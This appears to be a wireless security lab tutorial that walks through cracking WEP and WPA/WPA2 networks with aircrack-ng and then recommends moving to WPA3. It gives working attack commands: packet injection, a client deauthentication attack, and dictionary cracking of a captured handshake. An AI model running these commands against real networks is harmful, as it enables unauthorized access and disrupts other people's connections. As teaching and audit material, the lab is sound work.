Objective
Evaluate the security of a wireless network by testing different encryption protocols (WEP, WPA, WPA2) and understand the importance of adopting WPA3 for robust security.
Scenario
As a cybersecurity analyst, you are tasked with assessing the security of your organization’s wireless network. Older encryption protocols like WEP and WPA are vulnerable to attacks. In this exercise, you’ll simulate attacks on a wireless network using aircrack-ng to evaluate the strength of different encryption methods and understand why transitioning to WPA3 is essential.
⚠️ Important: Perform this exercise only in a legal and controlled lab environment. Unauthorized wireless attacks are illegal and unethical.
Lab Instructions
Step 1: Set Up the Wireless Access Point (AP)
- Use a wireless router or access point.
- Configure the AP with the following encryption settings one by one:
- WEP (64-bit/128-bit)
- WPA (TKIP)
- WPA2 (AES)
Example Configuration:
- SSID:
TestNetwork - WEP Key:
12345abcde - WPA/WPA2 Passphrase:
securepassword
Step 2: Install Aircrack-ng
On the Attacker Machine, install aircrack-ng:
sudo apt update
sudo apt install aircrack-ng -yStep 3: Capture Wireless Traffic
Identify the wireless network interface:
iwconfigEnable monitor mode on the interface:
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 upScan for the target network:
sudo airodump-ng wlan0Note the BSSID and Channel (CH) of TestNetwork.
Step 4: Crack WEP Encryption
Start capturing packets:
sudo airodump-ng --bssid <BSSID> -c <CH> -w wep_capture wlan0Inject packets to speed up data capture:
sudo aireplay-ng --arpreplay -b <BSSID> -h <Attacker_MAC> wlan0Crack the WEP key after sufficient data is collected:
sudo aircrack-ng wep_capture-01.capExpected Result: The WEP key is cracked within minutes.
Step 5: Attempt to Crack WPA/WPA2 Encryption
Capture the 4-way handshake:
sudo airodump-ng --bssid <BSSID> -c <CH> -w wpa_capture wlan0Deauthenticate a client to capture the handshake:
sudo aireplay-ng --deauth 5 -a <BSSID> wlan0Crack the handshake with a dictionary attack:
sudo aircrack-ng -w /path/to/wordlist.txt wpa_capture-01.capExpected Result: WPA/WPA2 may resist attacks depending on password strength.
Step 6: Document Findings
| Encryption | Time to Crack | Attack Method | Result |
|---|---|---|---|
| WEP | ~Minutes | ARP Injection + Crack | Key Compromised |
| WPA (TKIP) | Hours (Weak Key) | Dictionary Attack | Possible Compromise |
| WPA2 (AES) | Days+ (Weak Key) | Dictionary Attack | Highly Secure (Strong Key) |
Step 7: Discuss WPA3 Advantages
- WPA3 introduces enhanced security features:
- SAE (Simultaneous Authentication of Equals): Replaces PSK, making brute-force attacks ineffective.
- Forward Secrecy: Protects previous sessions even if a key is compromised.
- 192-bit Security Suite: Stronger encryption for enterprise networks.
Solution & Explanation
Why WEP and WPA Are Insecure
- WEP: Vulnerable to IV reuse and weak key management.
- WPA (TKIP): Susceptible to dictionary and replay attacks.
- WPA2 (AES): Strong encryption but can be vulnerable to weak passwords.
Importance of WPA3
- Resilience to Brute-Force: SAE makes password guessing ineffective.
- Enhanced Encryption: Uses modern cryptographic standards.
- Better Security for Open Networks: Opportunistic Wireless Encryption (OWE).
Mitigation Strategies
- Upgrade to WPA3: Use WPA3 where supported.
- Strong Passphrases: Use complex, high-entropy passwords.
- Disable WEP/WPA: Do not use outdated protocols.
- Network Segmentation: Isolate guest networks from internal systems.
- Regular Audits: Periodically test wireless security.
Testing & Verification
- Confirm that WEP and WPA networks are vulnerable to attacks.
- Verify that strong WPA2 passwords resist attacks.
- Check WPA3 configuration for enhanced security.
Additional Script (Optional)
Automate enabling WPA3 on a router (OpenWRT Example):
uci set wireless.@wifi-iface[0].encryption='sae-mixed'
uci set wireless.@wifi-iface[0].key='StrongWPA3Pass!'
uci commit wireless
wifi reload
Run the script:
chmod +x enable_wpa3.sh
sudo ./enable_wpa3.sh
Conclusion
In this exercise, you evaluated the security of wireless encryption protocols by simulating attacks on WEP, WPA, and WPA2 networks using aircrack-ng. The findings highlight the vulnerabilities of legacy encryption standards and the critical need to adopt WPA3 for robust wireless security.
0 Comments